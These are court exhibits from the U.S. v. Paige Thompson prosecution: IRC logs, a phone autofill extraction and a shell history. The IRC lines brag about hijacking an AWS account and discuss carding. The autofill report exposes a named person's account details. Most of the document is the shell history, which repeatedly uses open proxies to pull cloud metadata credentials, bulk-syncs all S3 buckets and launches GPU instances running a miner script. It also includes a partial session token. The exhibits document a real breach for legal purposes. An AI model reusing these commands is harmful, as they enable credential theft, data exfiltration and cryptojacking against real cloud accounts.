IRC Chats from 1B52 - md126 ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ freenode ▸ #netcrave

lder

| Name | Date modified | Type | Size |
|------|---------------|------|------|
| 2019-05-06.log | 5/6/2019 2:47 PM | Text Document | 19 KB |
| 2019-05-07.log | 5/7/2019 4:25 PM | Text Document | 2 KB |
| 2019-05-08.log | 5/8/2019 1:15 PM | Text Document | 2 KB |
| 2019-05-09.log | 5/9/2019 10:42 AM | Text Document | 9 KB |
| 2019-05-10.log | 5/10/2019 10:13 AM | Text Document | 1 KB |
| 2019-05-11.log | 5/11/2019 3:21 PM | Text Document | 1 KB |
| 2019-05-12.log | 5/11/2019 10:51 PM | Text Document | 1 KB |
| 2019-05-13.log | 5/13/2019 4:51 PM | Text Document | 1 KB |
| 2019-05-14.log | 5/14/2019 12:07 AM | Text Document | 1 KB |
| 2019-05-15.log | 5/15/2019 8:31 AM | Text Document | 1 KB |
| 2019-05-16.log | 5/16/2019 8:43 AM | Text Document | 1 KB |
| 2019-05-18.log | 5/18/2019 2:06 AM | Text Document | 1 KB |
| 2019-05-20.log | 5/20/2019 12:08 PM | Text Document | 1 KB |
| 2019-05-21.log | 5/20/2019 5:30 PM | Text Document | 1 KB |
| 2019-05-23.log | 5/23/2019 9:14 AM | Text Document | 1 KB |
| 2019-05-24.log | 5/24/2019 3:14 PM | Text Document | 1 KB |
| 2019-05-25.log | 5/25/2019 3:30 PM | Text Document | 5 KB |
| 2019-05-27.log | 5/27/2019 11:10 AM | Text Document | 2 KB |
| 2019-05-28.log | 5/28/2019 8:23 AM | Text Document | 5 KB |
| 2019-05-29.log | 5/29/2019 3:07 PM | Text Document | 1 KB |
| 2019-05-30.log | 5/30/2019 1:49 PM | Text Document | 2 KB |
| 2019-05-31.log | 5/31/2019 5:27 AM | Text Document | 1 KB |
| 2019-06-01.log | 5/31/2019 6:48 PM | Text Document | 1 KB |
| 2019-06-02.log | 6/2/2019 2:46 PM | Text Document | 1 KB |
| 2019-06-03.log | 6/3/2019 5:58 AM | Text Document | 1 KB |
| 2019-06-04.log | 6/4/2019 8:42 AM | Text Document | 5 KB |
| 2019-06-05.log | 6/5/2019 10:49 AM | Text Document | 24 KB |
| 2019-06-06.log | 6/6/2019 9:07 AM | Text Document | 1 KB |
| 2019-06-07.log | 6/6/2019 11:20 PM | Text Document | 1 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 455
Admitted_____

2019-06-05.log

```
85  [07:27:49] <erratic> I'll prob fuck with it later, like I said last night, so much shit, so much. not enough time.
86  [07:30:27] <erratic> I dunno my friend said something to me awhile back thats got me thinking about carding alot lately
87  [07:30:47] <erratic> Luhn algorithm shit
88  [07:31:01] <erratic> and other issuance characteristics
89  [07:37:30] <erratic> evidently he's got a mag track writer
90  [07:37:47] <erratic> and emboss kits
91  [07:37:57] <erratic> and a lot of other shit
92  [07:38:28] <erratic> a poor ass white girl like me need those
93  [07:38:33] <erratic> to go shopping
```

```
 2019-06-05.log

 96  [07:53:40] <erratic> aws --profile astem iam create-login-profile --cli-input-json file://create-login-profile.json
 97  [07:53:43] <erratic> {
 98  [07:53:46] <erratic>     "LoginProfile": {
 99  [07:53:48] <erratic>         "UserName": "default",
100  [07:53:51] <erratic>         "CreateDate": "2019-06-05T07:52:15Z",
101  [07:53:53] <erratic>         "PasswordResetRequired": false
102  [07:53:56] <erratic>     }
103  [07:53:58] <erratic> }
104  [07:54:01] <erratic> aws sts get-caller-identity --profile astem
105  [07:54:03] <erratic> { "UserId": "AIDAU55F6ZVKSUXFH4SMH", "Account":          4197", "Arn":
          "arn:aws:iam::        4197:user/default"
106  [07:54:06] <erratic> }
107  [07:54:09] <erratic> heh heh heh heh heh
108  [07:54:11] <erratic> gottem
109  [07:54:14] <erratic> smells like bacon
110  [07:54:28] <erratic> anyone want a domain?
111  [07:54:44] <erratic> how about a storage gateway :D
112  [07:59:27] <erratic> how about... a big fat db.r4.large dump
113  [07:59:51] <erratic> hugedumps.com
```

2019-06-05.log

```
118  [10:01:52] <erratic> I think if we all worked together we could turn a substantial number of the internet's rogue bots into our
     own outlet that would finance our projects
119  [10:02:36] <erratic> I do it all the time
120  [10:02:42] <erratic> just think of what we could do collectively
121  [10:03:34] <erratic> as long as we dont get much bigger of a group than we are now
122  [10:04:25] <erratic> I'm pretty careless but I'm careless because nobody gives a fuck
123  [10:04:33] <erratic> but I could stand to be less careless
124  [10:05:09] <erratic> seriously like
125  [10:05:13] <erratic> the shit I've done
126  [10:05:27] <erratic> way worse than what adrian lamo got arrested for initially
127  [10:05:41] <erratic> and that guy made his whole fucking career off being a scene whore
128  [10:05:53] <erratic> RIP adrian
```



# Extraction Report
Apple iPhone

## Autofill (36)

| Details | Deleted |
|---|---|
| **cardNumber:** 12726229<br>Source: Chrome          Timestamp: 3/28/2019 2:58:42 AM(UTC-7) | |
| **cardNumber:** 12726229<br>Source: Chrome          Timestamp: 3/28/2019 2:58:42 AM(UTC-7) | |
| **j_username:** josephbaleda<br>Source: Chrome          Timestamp: 3/28/2019 2:57:19 AM(UTC-7) | |
| **j_username:** josephbaleda<br>Source: Chrome          Timestamp: 3/28/2019 2:57:19 AM(UTC-7) | |
| **username:** josephbaleda<br>Source: Chrome          Timestamp: 3/28/2019 2:56:45 AM(UTC-7) | |
| **username:** josephbaleda<br>Source: Chrome          Timestamp: 3/28/2019 2:56:45 AM(UTC-7) | |
| **username:** joseph.baleda<br>Source: Chrome          Timestamp: 3/28/2019 2:56:39 AM(UTC-7) | |
| **username:** joseph.baleda<br>Source: Chrome          Timestamp: 3/28/2019 2:56:39 AM(UTC-7) | |
| **answer:** pizza<br>Source: Chrome          Timestamp: 3/28/2019 2:56:12 AM(UTC-7) | |
| **answer:** pizza<br>Source: Chrome          Timestamp: 3/28/2019 2:56:12 AM(UTC-7) | |
| **username:** joeybaleda<br>Source: Chrome          Timestamp: 3/28/2019 2:56:12 AM(UTC-7) | |
| **username:** joeybaleda<br>Source: Chrome          Timestamp: 3/28/2019 2:56:12 AM(UTC-7) | |
| **dobDay:** ▉<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobDay:** ▉<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingZipCodePrefix:** 98109<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingZipCodePrefix:** 98109<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobYear:** 1991<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobYear:** 1991<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **middleName:** A<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **middleName:** A<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **emailAddress:** josephbaleda@mailinator.com<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **emailAddress:** josephbaleda@mailinator.com<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line2:** ▉<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line2:** ▉<br>Source: Chrome          Timestamp: 3/28/2019 2:54:17 AM(UTC-7) | |

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 506
Admitted_____

| | | |
|---|---|---|
| **lastName:** Baleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **lastName:** Baleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobMonth:** <br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobMonth:** <br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **firstName:** Joseph<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **firstName:** Joseph<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line1:** <br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line1:** <br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **homePhoneNumberAreaCode:** 425<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **homePhoneNumberSuffix:** <br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **homePhoneNumberPrefix:** <br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.city:** Seattle<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |

506-002

```
    5  aws ec2 run-instances --            --region us-east-1 --instance-type p3.2xlarge --count 1
--image-id ami-           f372 --key-name default --subnet-id subnet-95b60499
--associate-public-ip-address --security-group-ids
   26  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.41.122.83:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/         awssession.sh
   28  aws ec2 describe-instances --region eu-north-1
   29  aws ec2 terminate-instances --instance-ids i-            58fe --region eu-north-1
   30  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-    1520 --key-name default --subnet-id subnet-f5b3b08d --associate-public-ip-address
--security-group-ids
   31  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-    1520 --key-name default  --associate-public-ip-address --security-group-ids
   32  aws ec2 describe-security-groups --region eu-west2
   33  aws ec2 create-key-pair --key-name default --region eu-west-2
   39  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-           6eab --key-name default  --associate-public-ip-address --security-group-ids
   40  aws ec2 authorize-security-group-ingress --group-id            --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-2 --region eu-west-2
   41  ls /home/erratic/aws_scan/.ssh/
   47  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id
ami-           6eab --key-name default  --associate-public-ip-address --security-group-ids
   50  aws ec2 run-instances --region eu-west-2 --instance-type p3.2xlarge --count 1 --image-id
ami-           6eab --key-name default  --associate-public-ip-address --security-group-ids
   51  aws ec2 describe-instances --region eu-west-2 |less
   53  aws ec2 describe-instances --region eu-west-2 | grep IPAddress
   54  aws ec2 describe-instances --region eu-west-2 | grep IpAddress
   78  aws ec2 terminate-instances --instance-id            9c66
   79  aws ec2 terminate-instances --instance-id            9c66  --region us-west-2
   80  aws ec2 describe-instances --region eu-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId' | parallel aws ec2 modify-instance-attribute --instance-id {}
--instance-initiated-shutdown-behavior terminate --region eu-west-2
   82  aws ec2 run-instances --region us-west-2 --instance-type c5n.large --count 1 --image-id
ami-           0e791 --key-name default  --associate-public-ip-address --security-group-ids
           2544
  102  aws ec2 create-key-pair --region us-west-2 --key-name _
  105  aws ec2 terminate-instances --instance-ids i-           f7e41
  106  aws ec2 terminate-instances --instance-ids i-           f7e41 --region us-west-2
  107  aws ec2 run-instances --region us-west-2 --instance-type c5n.large --count 1 --image-id
ami-           e791 --key-name _  --associate-public-ip-address --security-group-ids sg-          2544
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 608
Admitted_____

```
--instance-initiated-shutdown-behavior terminate
  161  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.198.107.105:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh
  164  aws ec2 describe-instances --region us-east-1 describe-instances
  165  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-            0e791 --key-name _   --associate-public-ip-address --security-group-ids sg-            2544
--instance-initiated-shutdown-behavior terminate
  166  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-            0e791 --key-name _   --associate-public-ip-address --security-group-ids sg-    f0ae
--instance-initiated-shutdown-behavior terminate
  167  aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id
ami-            0e791 --associate-public-ip-address --security-group-ids sg-    f0ae
--instance-initiated-shutdown-behavior terminate
  170  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.72.226:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                    |
awssession.sh
  173  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-            0e791 --associate-public-ip-address --security-group-ids sg-    ce28
--instance-initiated-shutdown-behavior terminate
  174  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-            0e791 --associate-public-ip-address --security-group-ids sg-    ce28
--instance-initiated-shutdown-behavior terminate --subnet-id subnet-6ba95033
  175  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-            0e791 --associate-public-ip-address --security-group-ids sg-    5fee
--instance-initiated-shutdown-behavior terminate --subnet-id subnet-ce2545b93
  178  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-            0e791 --associate-public-ip-address --security-group-ids sg-    5fee
--instance-initiated-shutdown-behavior terminate --subnet-id subnet-ce2545b9
  181  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-            0e791 --associate-public-ip-address --security-group-ids sg-    0db7
--instance-initiated-shutdown-behavior terminate
  182  aws ec2 terminate-instances --region us-west-2 --instance-ids i-            c5d1
  190  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p identiphy/{} '&&' cd
identiphy/{} '&&' aws s3 sync s3://{} .
  191  aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-            e791 --associate-public-ip-address --security-group-ids sg-    0db7
--instance-initiated-shutdown-behavior terminate
  192  aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 1 --image-id
ami-            0e791 --associate-public-ip-address --security-group-ids sg-    0db7
```

```
--instance-initiated-shutdown-behavior terminate
  193  aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 1 --image-id
ami-          0e791 --associate-public-ip-address --security-group-ids sg-    0db7
--instance-initiated-shutdown-behavior terminate
  195  aws ec2 authorize-security-group-ingress --group-id sg-    0db7 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
  200  aws ec2 describe-instances --region us-west-2 --profile        | jq -r '.Reservations | .[] |
.Instances | .[] | .InstanceId' | parallel aws ec2 terminate-instances --instance-ids {}
  201  aws ec2 describe-instances --region us-west-2 --profile        | jq -r '.Reservations | .[] |
.Instances | .[] | .InstanceId'
  202  aws ec2 describe-instances --region us-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId'
  203  aws ec2 describe-instances --region us-west-2 --profile        | jq -r '.Reservations | .[] |
.Instances | .[] | .InstanceId' | parallel aws ec2 terminate-instances --instance-ids {} --region us-west-2
  204  aws ec2 describe-instances --region us-west-2 --profile | jq -r '.Reservations | .[] | .Instances |
.[] | .InstanceId' | parallel aws ec2 terminate-instances --instance-ids {} --region us-west-2
  205  aws ec2 describe-instances --region us-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId' | parallel aws ec2 terminate-instances --instance-ids {} --region us-west-2
  206  aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 1 --image-id
ami-          0e791 --associate-public-ip-address --security-group-ids sg-    0db7
--instance-initiated-shutdown-behavior terminate --key-name default
  207  aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 1 --image-id
ami-          0e791 --associate-public-ip-address --security-group-ids sg-    0db7
--instance-initiated-shutdown-behavior terminate --key-name default
  208  aws ec2 describe-instances --region us-west-2 --profile        | jq -r '.Reservations | .[] |
.Instances | .[] | .PublicIpAddress'
  209  aws ec2 describe-instances --region us-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
[.PublicIpAddress, .InstanceType]'
  213  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.159.42:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/             | awssession.sh
  220  aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id
ami-          6eab --associate-public-ip-address --security-group-ids sg-    f0ae
--instance-initiated-shutdown-behavior terminate
  221  aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id
ami-          5eab --associate-public-ip-address --security-group-ids sg-    8d55
--instance-initiated-shutdown-behavior terminate
  222  aws ec2 terminate-instances --instance-ids i-            e196 --region eu-west-2
  224  aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id
ami-          6eab --associate-public-ip-address --security-group-ids sg-    3d55
```

```
    --instance-initiated-shutdown-behavior terminate --key-name default
    225  aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id
ami-            4a80 --associate-public-ip-address --security-group-ids sg-    706e
--instance-initiated-shutdown-behavior terminate --key-name default
    227  aws ec2 describe-instances --region us-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
[.PublicIpAddress, .InstanceType]'
    228  aws ec2 describe-instances --region eu-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
[.PublicIpAddress, .InstanceType]'
    229  aws ec2 authorize-security-group-ingress --group-id sg-    706e --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-1
    235  aws sts-get-caller-identity
    236  aws ec2 describe-instances --region us-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
    238  aws ec2 terminate-instances --region us-west-2 --isntance-ids i-            64a2
    239  aws ec2 terminate-instances --region us-west-2 --instance-ids i-            64a2
    240  aws ec2 run-instances --region us-west-2 --instance-type c5n.18xlarge --count 1 --image-id
ami-            2791 --key-name _  --associate-public-ip-address --security-group-ids sg-            2544
--instance-initiated-shutdown-behavior terminate
    244  aws ec2 describe-instances --region us-west-2 | jq -r '.Reservations | .[] | .Instances | .[] '
    245  aws ec2 terminate-instances --region us-west-2 --instance-ids i-            9023
    246  aws ec2 terminate-instances help
    247  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.161.43.11:443
http://169.254.169.254/latest/meta-data/iam/security-credentials | awssession.sh
    250  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
ami            4a80 --associate-public-ip-address --security-group-ids sg-    706e
--instance-initiated-shutdown-behavior terminate --key-name default
    259  aws ecs describe-container-instances
    260  aws ecs describe-clusters
    261  aws ecs list-services
    262  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 18.232.116.219:8181
http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh
    266  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 54.200.124.191:3129
http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
awssession.sh
    268  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 35.174.143.129:8181
http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh
    270  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 35.174.143.129:8181
http://169.254.169.254/latest/meta-data/iam/security-credentials/            |
awssession.sh
```

```
283   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 3.0.239.184:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/                    | awssession.sh
284   aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' |                        /{} '&&' cd
          /{} '&&' aws s3 sync s3://{} .
286   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 54.200.150.203:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/              | awssession.sh
288   aws ecs list-tasks
289   aws ecs describe-services
291   aws ecs describe-container-instances --
292   aws ecs describe-clusters --
294   aws --profile             describe-instances
323   cp ../2018271FvR-                          .zip .
324   unzip 2018271FvR-                      .zip
325   less                              .json
350   aws --                      describe-instances --region us-west-2 | jq '.[]' | less
351   aws --                      describe-instances --region us-west-2 | jq '' | less
352   aws --                      describe-instances --region us-west-2 | jq -r '.Reservations.Instances
| .[] | .InstanceType' | less
353   aws --                      describe-instances --region us-west-2 | jq -r '.Reservations'
354   aws --                      describe-instances --region us-west-2 | jq -r '.Reservations' | less
355   aws --                      describe-instances --region us-west-2 | jq -r '.Reservations | .[] |
.Instances | .[] | .InstanceType' | less
356   aws --profile             list-tables
357   aws --profile             list-tables --region us-west-2
358   aws --profile             describe-db-clusters
359   aws --region us-west-2 --profile         rds describe-db-clusters
360   aws --region us-west-2 --profile         s3api list-buckets
361   aws --region us-west-2 --profile         s3api list-buckets | jq -r '.Buckets | .[] | .Name' |
parallel                      /{} '&&' aws --region us-west-2 --profile
          s3 sync s3://{} .
368   cd
aws_scan/                              5156/              /tmp/

391   aws --region us-west-2 --
392   aws --region us-west-2 --
393   aws --region us-west-2 --
394   aws --region us-west-2 --
395   aws --region us-west-2 --
396   aws --region us-west-2 --
```

608-005

```
397  aws --region us-west-2 -
398  aws --region us-west-2 -
399  aws --region us-west-2 -
400  aws --region us-west-2 -
401  aws --region us-west-2 -
402  aws --region us-west-2 -
891  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.235.8.209:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh
909  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-     706e
--instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh
910  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
ami-          4a80 --associate-public-ip-address --security-group-ids sg-     706e
--instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh
911  aws ec2 describe-subnets --region eu-west-1
912  aws ec2 describe-vpcs --region eu-west-1
913  aws ec2 create-default-vpc --region eu-west-1
914  aws ec2 describe-vpcs --region eu-west-2
915  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id
ami-          6eab --associate-public-ip-address --security-group-ids sg-     717f
--instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh
919  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.34.213.125:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/           | awssession.sh
922  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.34.213.125:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/           | awssession.sh
925  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.41.122.83:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/           | awssession.sh
927  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id
ami-          6eab --associate-public-ip-address --security-group-ids sg-     717f
--instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh
928  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id
ami-          46eab --associate-public-ip-address --security-group-ids sg-     9917
--instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh --key-name default
930  aws ec2 describe-security-groups --group-ids sg-     b917
931  aws ec2 describe-security-groups --group-ids sg-     b917 --region eu-west-2
941  aws ec2 modify-instance-attribute --instance-ids i-            3b027 --user-data ""
942  aws ec2 modify-instance-attribute --instance-id i-            0027 --user-data "" --region
eu-west-2
943  aws ec2 modify-instance-attribute --instance-id i-            3b027 --user-data="" --region
```

```
eu-west-2
  944  aws ec2 modify-instance-attribute --instance-id i-            b027 --user-data file:///dev/null
--region eu-west-2
  945  aws ec2 modify-instance-attribute --instance-id i-            b027 --user-data="[]" --region
eu-west-2
  946  aws ec2 modify-instance-attribute --instance-id i-            b027 --user-data="{}" --region
eu-west-2
  947  aws ec2 modify-instance-attribute --instance-id i-            b027 --user-data='{"value": ""}'
--region eu-west-2
  948  aws ec2 modify-instance-attribute --instance-id i-            b027 --user-data='{"value": "none"}'
--region eu-west-2
  949  aws ec2 modify-instance-attribute --instance-id i-            b027 --user-data='{"Value": ""}'
--region eu-west-2
  950  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id
ami-            6eab --associate-public-ip-address --security-group-ids sg-    b917
--instance-initiated-shutdown-behavior terminate --user-data --key-name default
  951  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id
ami-            6eab --associate-public-ip-address --security-group-ids sg-    b917
--instance-initiated-shutdown-behavior terminate --key-name default
  954  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.245.71.151:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
      | awssession.sh
  957  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.201.163.169:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh
  960  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.234.117.185:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/                |
awssession.sh
  964  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.220.55:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/            | awssession.sh
  968  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.234.188.25:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh
  971  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh
  973  aws ec2 create-key-pair --region eu-west-2
  977  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id
ami-            6eab --associate-public-ip-address --security-group-ids sg-    cef5
--instance-initiated-shutdown-behavior terminate --key-name default --user-data file://minersetup_eth.sh
  978  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id
ami-            6eab --associate-public-ip-address --security-group-ids sg-    cef5
```

```
--instance-initiated-shutdown-behavior terminate --key-name default --user-data file://minersetup_eth.sh
 981  aws ec2 authorize-security-group-ingress --group-id sg-████cef5 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-1
 982  aws ec2 authorize-security-group-ingress --group-id sg-████cef5 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-2
 988  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.159.42:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/█████████████ | awsession.sh
 989  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.159.42:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/████████ | awssession.sh
 992  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.214.49.137:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/██████████ | awssession.sh
 995  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.123.235:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/███████████████ \n
1000  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.77.46.101:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/██████████ | awssession.sh
1002  aws ec2 create-key-pair --region eu-west-2 --key-name default
1005  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.89.201.26:82
http://169.254.169.254/latest/meta-data/iam/security-credentials/█████████████ | awssession.sh
1008  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.197.114.244:80
http://169.254.169.254/latest/meta-data/iam/security-credential██████████ | awssession.sh
1016  echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-03-12T09:58:25Z",\n  "Type" : "AWS-HMAC",\n
"AccessKeyId" : "█████████████KCOE",\n  "SecretAccessKey" :
"████████████████████████B3k7",\n  "Token" :
"FQoGZXIvYXdzEAMaDAkUD+ZBFfycBzbRDCK3AzDUI5Xk6f5aL0KvC82nEkYEkZI2JNSAixZ79c3/LKpAq1djCXxSauj2AIJRNNIKnxd4U8
BVsPSqRD7jJujXXXrUp9tcwTy+Cm0SyrBAP4iqJZfDslHKMi0ihzeCOdnulQ55GWwcznlIlm+WR4orYAyJvRonvqiRjBKV7jBXrWxT0T7MN
6my8j1b0xoUHaQsdEOA3Q8Lic73F4HjADsF1hT7UO+90zRrRx8J6PycGt+II6aLu0cROAtF5+CDvkQCQUeoJuJDo2damT4BGiyptVHesC7K
x8IdDboXIcCH8I3VsCxmOavVjVrPLXB7OQMslFE+gvME5CUPrAztLHC4CdsEvoQDpsrrwLpKzXLvEVu3QboGX1jwPZBEVkxSdoR0Zkf6Z1a
tudRzdE7rGvTPkloN/snzWdCejEPgC/vF7lM7ViiwgZ0/+62POTAQrooA32ioAWS/ZzqW/ekQhlTXKJbFWCCf17N/ZUakwsaefVb9c+DZk7
0w4HkNmBfGkSNLdRGXUEbrd1tqPg3xEaqIoACvkB2p8VAhCD1v/l6UfGwBtugc8zr0ccLUZ11dJ/tK38783Pu0mCgo4YWe5AU=",\n
"Expiration" : "2019-03-12T16:07:07Z"\n}' | awsession.sh
1023  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.0.239.184:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/██████████ | awssession.sh
1059  mv ███████████████████ ./aws_scan
